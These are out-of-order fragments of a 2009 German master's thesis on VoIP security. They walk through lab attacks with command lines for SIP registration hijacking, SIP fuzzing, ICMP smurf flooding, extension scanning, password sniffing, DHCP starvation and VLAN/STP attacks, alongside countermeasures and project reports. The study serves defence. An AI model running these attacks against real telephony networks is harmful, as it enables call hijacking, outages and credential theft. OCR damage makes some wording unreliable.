330. riffsziel sein als Beispiel seien genannt Switche Router Gateways Rechner mit Softphones VOIP Server IP Telefone IP Telefonanlage u s w Jeder am Netzwerk angeschlossener Rechner birgt eine Gefahr Einerseits kann von diesem aus eine interne Attacke gegen die VOIP Systeme ausgef hrt werden andererseits kann ein Angreifer mittels Trojaner oder sonstiger Malware von extern ungeachtet ber einen Rechner ins Netzwerk eindringen und den Angriff gegen die VOIP Systeme vornehmen Aus Bequemlichkeit Unwissenheit und Kostengr nden wird oftmals auf Sicherheitsmassnahmen in Netzwerk verzichtet Die Ausrede wir haben ja eine Firewall ist oft genug zu h ren Nicht installierte Sicherheitspatche veraltete Software oder gar keine Software gegen Malware bietet einem Angreifer noch bessere M glichkeiten Oft sind es kleine Ursachen die zu den ganz grossen Auswirkungen f hren k nnen Komponenten welche mittels Managementzug ngen ber das Netzwerk konfiguriert werden k nnen auf denen immer noch der Standardbenutzeraccount mit dem Standardpasswort aktiv ist haben in einem sicheren Netzwerk absolut nichts verloren Sei dies Switche Router Gateways oder VOIP Terminals ffentlich zug ngliche Orte oder R ume in denen Netzwerkanschl sse VOIP Telefone oder sogar Netzwerkkomponenten vorhanden sind sind dementsprechend abzusichern Wie schnell hat ein Angreifer ein Kabel eines bedeutenden Servers ausgezogen ein Laptop zur Datenaufzeichnung
331. rkeit x yersinia Downloadlink Quelle des Tools Schweregrad http www yersinia net download htm 1 leicht 6 schwer Das Tool ist ebenfalls in BackTrack3 enthalten Hinweise zu Installation Verf gbarkeit Installation Tool 4 Anwendung Too 5 Das Tool ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 4 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 6 Ziel Angriff Analyse Der Angreifer sendet mit dem Tool yersinia DTP Dynamic Trunking Protocol Pakete zum Switch bei welchem die Ports auf VLAN Auto Trunking konfiguriert sind Er t uscht mit diesen DTP Paketen vor als w re er auch ein Switch der VLAN f hig ist Der Angreifer kann dann die Broadcast und Multicast Nachrichten aller VLANs mitlesen Ebenfalls nimmt er auch am VLAN Trunking Protocol teil was ihm die M glichkeit gibt die ganze VLAN Konfiguration zu ndern So k nnen zum Beispiel neue VLANs erzeugt oder bestehende gel scht werden Letzteres ist ein DoS Denial of Service Angriff denn mit dem L schen bestehender VLANs werden die entsprechend konfigurierten Hosts oder IP Phones nicht mehr erreichbar sein Schutz gegen Angriff Analyse Kommentar Leider reichte die Zeit im Rahmen dieser Diplomarbeit nicht aus um diesen Angriff praktisch auszuf hren Der Vollst ndigkeit wegen wird d
332. rkungen und Gefahren fiir das Angriffsziel gehen von diesem Angriff aus Oben gezeigte Angriffe zielen auf die Vertraulichkeit und Verf gbarkeit ab Einerseits kann eine MitM Man in the Middle Attacke ausge bt werden bei der s mtliche Daten eines Netzsegmentes ber den PC des Angreifers gelenkt werden k nnen Dieser kommt in Kenntnis des Inhaltes von Daten respektive Medienstreams Je nach Inhalt dieser Daten k nnen die so ersnifften Informationen f r weitere Angriffe eingesetzt werden Andrerseits ist auch eine DoS Denial of Service Attacke auf die Verf gbarkeit der Hosts IP Telefone und VOIP Server m glich W hrend des Floodens setzen die Switche ihre Pfade zueinender auf inaktiv und k nnen keine Daten mehr bertragen Die im Netzwerk vorhandenen Hosts IP Telefone und VOIP Server k nnen dadurch nicht mehr erreicht werden Schema Testlabor Setup f r STP Angriff Asterisk Proxy Server SIP Phone Aastra 57i SIP Phone Aastra 53i 10 1 1 101 10 1 1 129 10 1 1 121 User Agent 4129 User Agent 4111 Router Netopia 3347 10 1 1 1 Switch 10 1 1 191 Angreifer 10 1 1 241 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 151 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 6 5 1 VLAN Angriff Integrit t ae eennseenseensenn x Vertraulichkeit x Eingesetztes Tool Verf gba
333. rmindert gegen ber der manuellen Konfiguration der VOIP Terminals den Aufwand um das Vielfache Deshalb beziehen in den heutigen Netzwerken die meisten am Netzwerk angeschlossenen Ger te ihre Konfiguration per DHCP M gliche Zuweisungen welche per DHCP an die Hosts gegeben werden k nnen sind IP Adresse und Netzwerkmaske Default Gateway Name Server WINS Server Proxy Konfiguration TIME und NTP Server NDS Server Die zu vergebenden IP Adressen sind vielfach aus einem vorbestimmten IP Adressbereich des Netzwerkbetreibers und sind in der Anzahl sowieso durch Netzwerkmaske beschr nkt Somit sind bei dem DHCP Starvation Angriff innert weniger Sekunden keine freien IP Adressen mehr verf gbar Die VOIP Endger te erneuern von Zeit zu Zeit oder beim Aufstarten ihre Konfiguration Sind infolge des Angriffes keine freien IP Adressen mehr verf gbar k nnen sich die Endger te nicht mehr am Netzwerk anmelden und sind daher weder f r abgehende noch ankommende VOIP Verbindungen brauchbar Durch diesen Angriff DoS Denial of sService ist die Verf gbarkeit der ganzen Telefonieinfrastruktur eingebrochen DHCP Rouge Server Gibt der Angreifer sich mit obigem Resultat noch nicht zufrieden kann er seinen Angriff weiter ausbauen Er stellt einen eigenen DHCP Server Router oder DHCP Server ins Netzwerk Die per DHCP DISCOVER fragenden Hosts und VOIP Terminals beziehen somit die Netzwerkkonfiguration vom Angreifer da der legale
334. roffen Der Aufbsu de Testumgebung st in vollem Gange Sitzung mit Betreuer 3 Sitzung mit Betreuer steht am 7 11 2008 an Ziel Besprechung Fflichtenheft Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 228 14 4 3 Statusbericht Nr 3 oo Berner Fachhochschule Inu Technik und Informatik Software Schule Schweiz Projektangaben Titel der Arbeit VOIP Security Nummer _MAS 06 02 20 Datum Ststusbericht Montag 25 November 2008 Projektbeteiligte Auftraggebe Selbsteingebrschtes Thems Betreuer Kurt J rmenn Aastra Telecom Schweiz AG Posten IST Begr ndung Pflichtenheft fertig erstellt Termine Bewertungsschems besprochen Testumgebung aufgebeut Erste Angriffe get tigt gt Zeitaufwand gross Qualit t Leistung IST Situation auf Kurs vom Kurs leicht abgewichen Laufende offene Arbeiten Auf Kurs exsktes Arbeiten angestrebt Legende Tendenz Verbssserung Qleich bleibend Verschlechterung Oss Pflichtenheft ist fertig erstellt und bereit zum Upload Besprechung Pflichtenheft am 25 11 2008 mit Experte abgehsiten wobei such dss Bewertungsschema definiert wurde Die Testumgebung ist volst ndig sufgebsut und bereit f r Ang iffsversuche Kurs Pr sentetionstechnik am 20 11 2008 besucht Definition Realisierungskonzept Definieren alle VOIP Angriffe und Eruierung weiterer Took Reslsierung Die ersten Analysen und VOIP Angriffe auf das SIP Protokoll sind
335. rt discard 9 Dst Port sip 5060 a Request Line REGISTER sip 10 1 1 101 SIP 2 0 a Via SIP 2 0 UDP 10 1 1 121 branch bca505d4 d3ed 4494 a374 5a9f034818e9 From 4111 lt sip 4111 10 1 1 101 gt tag bca53398 d3ed 4494 a98f f0315d66df74 To lt sip 4111 10 1 1 101 gt Contact Supported replaces Call ID bca54f66 d3ed 4494 895a Sebfalc4ab84 CSeq 100 REGISTER Expires 0 User Agent Hacker Max Forwards 16 Allow INVITE ACK CANCEL BYE NOTIFY REFER OPTIONS INFO SUBSCRIBE om 2 10 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Da der Registrierungszustand eines User Agents nicht dauernd vom Registrar und dem Terminal berwacht wird ist dieser Angriff schwer zu erkennen Da noch abgehende Anrufe get tigt werden k nnen bemerkt dies der angegriffene User Agent nicht sofort In dieser Zeit gehen alle ankommenden Anrufe verloren Auch wenn der betroffene User Agent sich wieder ordnungsgem ss registriert kann der Angreifer die Nachricht zum L schen immer wieder senden Passiert dies innert sehr kurzen Zeitintervallen unterst tzt durch ein selbst geschriebenes Script welches das Tool erase_registrations periodisch aufruft so ist das Angriffsziel fast nicht mehr erreichbar Wird dieser Angriff auf s mtliche Terminals eines Betriebes ausgeweitet so ist dieser praktisch lahm gelegt was dessen Erreichbarkeit betrifft Diplomarbeit VOIP Security 19 02 2009 S Sch r
336. rvalls verk rzen Terminals haben meist einen Standardwert von 3600 Sekunden Das heisst das gehijackte Terminal meldet sich nach Ablauf dieser Zeit wieder automatisch am Registrar an Bis dahin bleibt das Terminal jeweils ankommend unerreichbar TCP f r die SIP Verbindungen verwenden Somit ist eine verbindungsorientierte Kommunikation zum SIP Proxy gegeben in welcher die Pakete durch Sequenznummern gekennzeichnet sind Ein Manipulieren einer solchen Verbindung ist um ein Vielfaches erschwerter als eine mit UDP Siehe Massnahmen Authentisierung von SIP Nachrichten Kapitel 8 1 2 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen TLS und SIP Kapitel 8 1 4 Siehe Massnahmen IPSec und SIP Kapitel 8 1 5 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 65 eee Berner Fachhochschule Technik und Informatik Software Schule Schweiz 2 10 2 Technik und Funktionsweise Eine korrekte Registrierung bei einem SIP Proxy Server beinhaltet in den Paket Feldern Contact und Expires wichtige Informationen So sagt das Contact Feld aus um welchen User Agent es geht und im Feld Expires wird angegeben wie lange die Registrierung bestehen bleibt bis sich der betreffende User Agent wieder registrieren muss Gelingt es einem Angreifer eine gespoofte Register Nachricht an den SIP Proxy Server zu senden worin genau diese 2 Felder modifiziert wurden kann er die Regist
337. s Angriffes keine anderen Aufgaben erledigen konnte Selbst nachdem der Angriff beendet worden war konnte ber den Gateway nicht kommuniziert werden Ein Reboot des Gateways musste vorgenommen werden um wieder ber diesen kommunizieren zu k nnen Eile Edit View Go Capture Analyze Statistics Help Eilter Expression Clear Apply Destination Protocol Ost 25 as o C re 15 859817 10 1 1 1 10 1 1 201 ICMP Echo ping request 5830 15 860335 10 1 1 201 S56 Fs Es ES ICMP Echo ping reply 5831 15 863153 E To BE PE PE 10 1 1 201 ICMP Echo ping request 5832 15 863779 10 1 1 1 10 1 1 201 ICMP Echo ping request 5833 15 864341 10 1 1 201 IEEE ICMP Echo ping reply 5834 15 867288 393535353 IOFAST I ICMP Echo ping request 5835 15 871146 10 FEE EAE E e ya bh ICMP Echo ping request 5836 15 871810 10 1 1 1 10 1 1 121 ICMP Echo ping request 5837 15 874066 10 1 1 121 1 Ba Be BF ICMP Echo ping reply 5838 15 875161 10 1 1 1 10 1 1 129 ICMP Echo ping request 5839 15 875888 z Uo pa ee iP 10 1 1 129 ICMP Echo ping request 5840 15 877116 10 1 1 129 30 13 ICMP Echo ping reply 5841 15 879218 10 1 1 1 10 1 1 151 ICMP Echo ping request 5842 15 879861 10 1 1 1 10 1 1 151 ICMP Echo ping request 5843 15 880050 10 1 1 151 E A ses Uae Tee A ICMP Echo ping reply 5844 15 883159 10 1 1 1 10 1 1 141 ICMP Echo ping request jm Frame 5828 1066 bytes e 1066 bytes captured Ethernet II Src vmware_55 dd b4 00 0c 29
338. s Tools Schweregrad 1 leicht 6 schwer http www wireshark org download html Hinweise zu Installation Verf gbarkeit Installation Tool 3 Anwendung Tool 3 Wireshark ist sowohl unter Windows wie auch Linux Unix lauff hig Erforderliche Vorkenntnisse 5 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 4 Ziel Angriff Analyse Asterisk Proxy Server erlauben folgende drei verschiedenen Authentifizierungen der IAX Clients Klartext MD5 oder RSA RSA wird infolge des hohen Handling Aufwandes des Schl sselpaares public und private key sehr selten eingesetzt obwohl dies die sicherste Authentifizierungs Methode w re Die MD5 Authentifizierung bietet auch nur dann einen wirksamen Schutz wenn sichere Passw rter verwendet werden Bei der Klartext Authentifizierung werden sowohl Benutzername und Passwort in Klartext ber das Netzwerk gesendet Ziel des Angreifers ist es an Passw rter und die dazugeh rigen Benutzerkonten zu kommen Einmal im Besitz dieser Angaben kann der Angreifer ein eigenes Telefon mit den falschen Benutzerkonten an das Netzwerk anschliessen Dadurch wird die Registrierung des zuvor im Netzwerk vorhandenen originalen TAX Clients gel scht Alle ankommenden Anrufe klingeln beim Angreifer Auch kann der Angreifer abgehende Gespr che mit falscher Identit t f hren Dadurch k nnen auch Gespr che auf Kosten anderer gef hrt w
339. s am besten ist BackTrack3 als ISO File herunter zuladen und in einer virtuellen Umgebung laufen zu lassen Dadurch k nnen aufgezeichnete Traces Logfiles vordefinierte IP Pakete und andere linuxbasierende Angriff Tools einfach implementiert respektive gespeichert werden BackTrack3 beinhaltet sehr viele vorinstallierte Tools welche f r andere linuxbasierende Angriff Tools auch ben tigt werden BackTrack3 bietet somit eine Basisinstallation einer Linux Distribution von welcher aus auch sehr gut Angriffe get tigt werden k nnen ohne dass die Tools selbst darin enthalten sind Dazu sind einfach die entsprechenden Files des gew nschten Tools nach BackTrack3 herunter zuladen zu kompilieren und den Angriff aus dem Terminalfenster von BackTrack3 heraus zu starten Eine Installationsanleitung soll aufzeigen wie zuerst VMware und dann BackTrack3 in VMware installiert wird Da die Angriffe welche in dieser Diplomarbeit aufgezeigt werden durch die Leser dieses Berichtes auch selbst nachvollziehbar sein sollen ist nachfolgend genaustens Schritt f r Schritt der Installationsablauf dieser zwei Programme aufgezeigt 1 5 1 Installation VMware Server VMware Server wurde als virtuelle Maschine gew hlt weil sie im Gegensatz zur VMware Workstation kostenlos ist VMware Server stellt etwas h here Anforderungen an die Hardware respektive an die Performace des PC s worauf es installiert werden soll Jedoch wird von dem PC eines Angreifers sowieso erw
340. s der gewiinschte Nummernbereich erstellt wurde Somit werden einfach und schnell die gew nschten Nummern erstellt welche dann nur noch in users txt zu kopieren sind Der oberste schon bestehenden Eintrag des Files users txt thisisthecanary muss bestehen bleiben Nat rlich k nnen in users txt auch alle Nummern von 1 xyz eingetragen werden Dementsprechend wird der Scann Vorgang einfach l nger dauern wobei es zu sagen gilt dass das Tool wirklich sehr schnell arbeitet Die Registration Requests werden an den Asterisk Proxy Server 10 1 1 101 per UDP auf den Port 5060 gesendet ge SIPScan ko le wi File Help ED Version 1 0 Target SIP Server Target SIP Domain Transport Port 10 1 1 101 J 10 1 1 101 Jupp v 5060 IV REGISTER Scan Username Extensions File Timeout s OPTIONS Scan J users txt 2 I INVITE Scan 1 gt gt Found a live extension user at 4002 10 1 1 101 with SIP response code s REGISTER 200 2 gt gt Found a live extension user at 4003 10 1 1 101 with SIP response code s REGISTER 200 3 gt gt Found a live extension user at 4111 10 1 1 101 with SIP response code s REGISTER 200 4 gt gt Found a live extension user at 4115 10 1 1 101 with SIP as response code s REGISTER 200 5 gt gt Found a live extension user at 4119 10 1 1 101 with SIP response code s REGISTER 401 6 gt gt Found a live extension user at 4129 10 1 1 101 with SIP response code s REGISTER 200 ie
341. s gem ss Kapitel 2 6 1 dieses zuerst mittels einer Dictionary Attacke herausgefunden werden 2 8 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer beabsichtigt mit seinen Angriff folgende Wirkung Es soll User Agent 4129 zu 4111 gehijackt werden Alle ankommenden Anrufe f r 4129 rufen dann beim User Agent 4111 Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet reghijacker ethO 10 1 1 101 10 1 1 101 4111 10 1 1 121 results u 4129 10 1 1 29 p 1234 v Die Argumente im Einzelnen stehen wie folgt f r reghijacker Aufruf Tool ethO Besagt ber welche Schnittstelle des PC s der Angriff gestartet werden soll 10 1 1 101 Domain des Registration Hijackings 10 1 1 101 Domain des SIP Proxy Servers Registrars 4111 10 1 1 121 Contact Info Umleitziel results Ausgabefolder des Logs u 4129 10 1 1 129 Angriffsziel dieser User Agent soll gehijackt werden p 1234 Passwort des zu hijackenden User Agents V Voransicht erzeugt mehr Logs Das Tool selbst schreibt dann Siehe gelb markiert unten mit dem Absenden dieses Strings f r welchen Zweck obige Argumente eingesetzt wurden Zuerst l scht das Tool die noch aktuelle Registration des User Agents 4129 Eine L sch Registrationsnachricht kennt SIP nicht Zum L schen wird einfach nochmals eine Registration f r den User Agent 4129 durchgef hrt jedoch mit als Contact Information und 0 als g ltige
342. s umgangen 6 7 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer beabsichtigt Zugriff auf die Managementkonsole des Switches 10 1 1 1191 zu erlangen Er weiss weder Passwort noch dass der Switch auf der Managementkonsole nur mit einer bestimmten IP Adresse Zugang gew hrt Da der Angreifer das Passwort des Managementzuganges des Switches nicht kennt muss er zuerst in dessen Kenntnis kommen Dazu horcht er das Netzwerk mittels Cain amp Abel nach Passw rtern ab Damit der Angreifer das Netzwerk nach Passw rtern abhorchen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Wie Passw rter im Netzwerk mittels Cain amp Abel abgehorcht werden wurde schon im Kapitel 2 5 1 vorgestellt Von Cain amp Abel abgehorchte Zugangsdaten Auch gut ersichtlich ist von welchem Client auf welchen HTTP Server zugegriffen wurde File view Configure Tools Help yk mmR504n 0 E Dedes E var Ja ster 7 Guter Tecate JRR cou HTTP server Password URL A CHALE cha A Po NTLM SPOOF SPOOF OD AUTH RESET NTLN wee Passwords A FTP 0 18 01 2009 15 28 51 213 199 174 196 10 1 1 101 iefvrt http de msn c http fde msn com ocid iefvrt amp HTTP 16 18 01 2009 15 28 51 65 55 197 115 10 1 1 101 iefvrt 1440 HTTP L 1 http de msn comj ocid iefyrt je IMAP 0 18 01 2009 15 28 51 65 55 197 115 10 1 1 101 iefyrt 1390 HTTP
343. s vollumf nglich einverstanden sind Herr Mathias Engel Experte BFH Bern Datum Unterschrift Herr Kurt J rmann Experte BFH Bern Datum Unterschrift Herr Stefan Sch r Diplomand BFH Bern Datum Unterschrift Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 222 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 14 2 Festlegung der VOIP Angriffe Realisierungskonzept 5 12 2008 Festlegung der VOIP Angriffe f r die 16 00 Uhr Diplomarbeit VOIP Security 4500 Solothurn Realisierungskonzept Einberufen von Stefan Sch r Besprechungsart Master Thesis Sitzung Besprechungsleiter Kurt J rmann Protokollf hrer Stefan Sch r Zeitnehmer K J rmann S Sch r Teilnehmer K J rmann S Sch r Bitte lesen Vorg ngig Pflichtenheft Bitte mitbringen Pflichtenheft Tagesordnungspunkt Vortragender Stefan Sch r Diskussion Welche VOIP Angriffe sollen in welchem Ausmass statt finden Es werden die VOIP Angriffe definiert die im Rahmen der Diplomarbeit von Herrn S Sch r durchgef hrt werden sollen Dabei wird eine Priorit t der Angriffe festgelegt die vom Bekanntheitsgrad und somit von der Verbreitung der jeweiligen Protokolle abh ngt Beschl sse Siehe untenstehende Aufgaben Aufgaben Zust ndige Person Die Priorit t der Angriffe auf die Signalisierungsprotokolle wird auf SIP gelegt SIP ist am Markt sehr etabliert und wird in Zukunft lte
344. schl sselungsmethode w hlt und das Passwort eventuell sogar als Klartext ber das Netzwerk bertr gt Ein Terminal ist ein multimedialer Endpoint in einer Zone wobei die Kommunikation mittels eines Netzwerks realisiert wird Somit kann ein Terminal entweder ein IP Telefon oder ein Soft Phone sein Enumeration ist eine Aufz hlung Dabei werden bei einem Angriff mittels Enumeration potentielle Angriffsziele im Netzwerk gesucht Ettercap ist ein freies Computerprogramm f r Man In The Middle Angriffe Es unterst tzt Sniffing auf IP wie auch auf ARP Basis Echtzeitkontrolle ber Verbindungen selbst in geswitchten Netzwerken inhaltbezogenes Filtering und aktive wie auch passive Analysen von einzelnen Hosts und ganzen Netzwerken In ein Netz bzw einen Switch werden massenhaft Datenpakete eingeschleust welche alle eine andere MAC Adresse enthalten Der Switch speichert nun jede einzelne der gef lschten generierten MAC Adressen bis sein interner Speicher berl uft In diesem Fall schaltet der Switch in einen so genannten Failopen Mode Dadurch werden nun alle Pakete ob Unicast oder Broadcast an alle angeschlossenen Netzteilnehmer gesendet wie ein Hub Damit hat ein Angreifer die M glichkeit den Netzwerkverkehr mitzuschneiden sniffen Flooding engl berfluten bezeichnet das Uberschwemmen eines Netzwerkes mit Paketen Dies kann gewollt sein wie im Fall von OSPF das mit Hilfe dieser Technik Informationen an alle ange
345. schlossenen Rechner bermittelt oder Usenet in dem die Artikel durch Versenden an alle Rechner im Usenet Netzwerk verteilt werden Flooding kann aber auch unerw nscht sein wie bei flood Pings die damit den Datenverkehr in einem Netzwerk lahmlegen k nnen und so einen DoS herbeif hren k nnen oder bei einem SYN Flood Angriff auf einen einzelnen Rechner der mit massenweisen Anfragen Uberschwemmt wird 19 02 2009 Berner Fachhochschule Technik und Informatik Software Schule Schweiz http de wikipedia org wiki Credenti als http de wikipedia org wiki DHCP Sicherheit http de wikipedia org wiki DHCP_ Starvation_Attack http de wikipedia org wiki Dictionar y_Attack http de wikipedia org wiki Denial_o f_Service http www voip information de voip mittelstand itu t 2 html http de wikipedia org wiki Ettercap http de wikipedia org wiki MAC Flooding http de wikipedia org wiki Flooding _ Informatik S Sch r MAS 06 02 20 Seite 200 Fuzzing G 729 Gatekeeper H 225 H 323 HUB IAX IAX2 ICMP Redirect IDS Integrit t IP Spoofing Diplomarbeit VOIP Security Fuzzing auch Robustness Testing oder Negative Testing ist eine spezielle Technik f r Software Tests Hierf r werden automatisch mit Tools zuf llige Daten erzeugt die ber Eingabeschnittstellen eines Programms verarbeitet werden z B durch Offnen einer Datei deren Datenformat das Programm unterst tzt G 7
346. schnell pulsend bis andauernd beim Angriffsziel eintreffen erzeugt dieser Angriff Rufsequenzen verschiedenster Art Die Worte Hilfe in meinem Telefon spukt oder geistert es w ren wohl die richtige Beschreibung um das Empfinden des Angegriffenen auszudr cken Ein gleichzeitiges Fuzzen aller in einem Betrieb befindlichen Terminals l sst die Verf gbarkeit der Telefonieinfrastruktur g nzlich einbrechen Ein Telefonieren w hrend dieses Angriffes ist nicht mehr m glich 2 13 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Bei nachfolgendem Angriff soll der User Agent 4129 mittels Protos Test Suite dem SIP Fuzzing Test unterzogen werden Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet java jar c07 sip r2 jar touri 4129 10 1 1 101 fromuri 4111 10 1 1 101 teardown sendto 10 1 1 129 dport 5060 validcase start 1 Die Argumente im Einzelnen stehen wie folgt fiir java jar cO7 sip r2 jar gt gt Startet Protos in der Java Umgebung touri 4129 10 1 1 101 gt gt Angriffsziel Empf nger der Nachrichten fromuri 4111 10 1 1 101 gt gt Initiator der Nachrichten teardown gt gt CANCEL nach jeder INVITE Nachricht damit freie Leitungen vorhanden bleiben sendto 10 1 1 129 gt gt Pakete werden an diese IP Adresse gesendet dport 5060 gt gt Portnummer des Angriffszieles an welches die Pakete gesendet werden sollen validcase gt gt Nach jedem Test Case wir
347. selbst nicht in BackTrack3 enthalten sind Im Terminalfenster von BackTrack 3 wird smurf c gestartet und der Angriff mit folgenden Argumenten aufgerufen smurf 10 1 1 1 list txt 100000 10 960 Die Werte im Einzelnen stehen wie folgt f r smurf Aufruf Programm 10 1 1 1 Gespoofte IP Adresse des Angriffziels list txt Liste der Hosts an welche PING s gesendet werden sollen auch Broadcast 100000 Anzahl zu sendender ICMP Echo Requests 10 Zeit in Millisekunden zwischen den einzelnen 960 Gr sse des Paketes smurf 10 1 1 1 list tx lt t 100000 smurf c by Freak Flooding 10 1 1 1 25 outgoing packets Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 154 Berner Fachhochschule Technik und Informatik Software Schule Schweiz Untenstehender Wireshark Trace zeigt die ICMP PING Echo Requests mit der gespooften Source IP Adresse 10 1 1 1 Im unteren Fenster unter Ethernet II ist zu sehen dass diese Pakete jedoch von der virtuellen Maschine Vmware aus gesendet worden war auf welcher BackTrack 3 installiert ist In Paket Nr 5830 5833 5837 5840 und 5843 antworten die Hosts mittels ICMP Echo Reply und senden die Pakete dadurch ans Angriffsziel Innert wenigen Sekunden nach dem Starten des Angriffs waren weder abgehende noch ankommende Verbindungen ber den Gateway 10 1 1 1 m glich Dieser war mit dem Abarbeiten der enormen Menge an ICMP Echo Replays so besch ftigt dass er w hrend de
348. sem Diplom Bericht auch noch fiir weitere Angriffe gebraucht Die Installation von Cain amp Abel ist men gef hrt und selbsterkl rend deswegen wird hier auf diese nicht n her eingegangen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 15 e0 oo Berner Fachhochschule Technik und Informatik Software Schule Schweiz Der Mechanismus ARP Spoofing wird in Kapitel 6 1 1 n her beschrieben In diesem Kapitel geht es lediglich darum aufzuzeigen wie in einem geswitchten Netzwerk Datenstr me anderer Switchports gesnifft werden k nnen Nach der Installation von Cain amp Abel kann dieses mittels Icon welches bei der Installation auf den Desktop erstellt wurde gestartet werden Als erstes muss kontrolliert werden ob unter dem Men punkt Configure die richtige Netzwerkkarte ausgew hlt ist mir der sp ter die Datenstr me gesnifft werden sollen Danach ist die Snifferfunktion mittels zweitem Icon von links in der oberen Taskleiste zu starten Im Tab Hosts kann mittels Kontextmen Klicken mit der rechten Maustaste in die Tabelle der MAC Address Scanner gestartet werden Dieser sucht alle am Netzwerk angeschlossenen Terminals und Server Der abzusuchende Netzwerk Range ist zu definieren und mittels OK zu best tigen Cain amp Abel zeigt daraufhin alle im Netzwerk gefundenen Komponenten an EA ow Ook i v a ommkssouwn Ff nn EA Decoders 2 Network Sniffer a a ae cou
349. sgangssituation Ablauf und Bedingungen f r Angriff 173 6 11 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 175 6 12 1 DoS LAND Flood 176 6 12 2 Technik und Funktionsweise 177 6 12 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 177 6 12 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 179 7 PBX Ascotel Intelligate 180 7 1 Signalisierungsprotokolle PBX Ascotel Intelligate 180 7 2 Authentication Attack 180 7 3 Fuzzing Attack 181 7 3 1 Fuzzing PBX Ascotel Intelligate 181 7 3 2 _ Fuzzing Systemendgerat Office 80IP 182 7 4 Medientransportprotokoll PBX Ascotel Intelligate 184 7 4 1 RTP Flood Office 80IP 185 7 5 Ethernetschnittstellen Media Switch PBX Ascotel Intelliagte 186 7 6 Bemerkungen zu PBX Ascotel Intelligate 186 8 Massnahmen gegen Angriffe 187 8 1 Massnahmen gegen Angriffe auf das SIP Siganlisierungsprotokoll 187 8 1 1 Authenifizierung der Endger te 187 8 1 2 Authentisierung von SIP Nachrichten durch Digest Authentisierung 187 8 1 3 S MIME und SIP 187 81 4 TLS und SIP SIPS 188 8 1 5 IPsec und SIP 188 8 2 Massnahmen gegen Angriffe auf Asterisk und das IAX2 Siganlisierungsprotokoll 188 8 2 1 Asterisk und Verschl sselung 188 8 2 2 Asterisk und MIDCOM 188 8 3 Massnahmen gegen Angriffe auf H 323 189 8 3 1 Substandard H 235 1 Baseline Security Profile 189 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 9 oo Berner Fachhochschule
350. sich sowohl f r ankommende wie auch f r abgehende Gespr che unter falscher Identit t am Terminal melden Die Terminal Daten k nnen wie folgt abge ndert werden um die Verf gbarkeit des Endger tes zu stoppen DoS Denial of Service Falsche Registrar IP eingeben Falsches Registrierungspasswort eingeben falls gebraucht Falscher Gateway eintragen vorhandener Gateway Eintrag l schen gt der Medienstrom wird nicht mehr korrekt gelenkt es wird nur noch die Signalisierung funktionieren die Sprachverbindung wird no way audio sein SW Downgrade durchf hren der weniger Sicherheitsmerkmale enth lt z Bsp Sprachverschl sselung deaktivieren etc Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 43 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 5 1 SIP Authentication Attack Integrit t nies an Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x Cain amp Abel Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer www oxid it Hinweise zu Installation Verf gbarkeit Installation Tool 2 Anwendung Tool 3 Cain amp Abel ist nur unter Windows lauff hig Erforderliche Vorkenntnisse 3 Die Installation ist einfach und men gef hrt Nach der Installation muss als erstes im Tab Configure die
351. siert und bereit gestellt Sitzung mit Betreuer 2 Sitzung mit Betreuer steht sm 22 10 2008 an Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 227 oo Berner Fachhochschule Inu Technik und Informatik Software Schule Schweiz 14 4 2 Statusbericht Nr 2 Projektangaben Titel der Arbeit VOIP Security Nummer MAS 06 02 20 Datum Ststus bericht Projektbeteiligte Auftrsggebe Selbsteingebrschtes Thems Betreuer Kurt J rmenn Aastra Telecom Schweiz AG Experte Mathiss Engel Cssssrius AG Diplomand Autor Ststusbericht Stefan Sch Asstra Telecom Schweiz AG Zusammenfassung Posten IST Begr ndung ge u Temine Erstellung Fflichtenheft in Endphase Quelitst Definition der Zeile pr zise formuliert Motivation Guter Fortschritt Aufbau der Testumgebung in vollem Gange Legende IST Situation Legende Tendenz suf Kurs 7 Verbsserung vom Kurs leicht gleich bleibend sbgewichen 2 stark vom Kurs sbgewichen Verschlechterung Abgeschlossene Die Ziele und die Toob wurden definiert Arbeiten Des Msterislf r Testumgebung st eingetroffen Laufende offene Erstellung Fflichtenheft Arbeiten Des Pflichtenheft stehtk urz vor der Fertigstellung Wenige Korrekturen betreffend Definitionen und Rechtschreibung stehen noch aus Die Ziele und die einzusetzenden Took wurden definiert Organis stion Mater isl f r Testumgebung Des Mete ial zum Aufbsu einer weiteren Testumgebung wurde organisiert und steinget
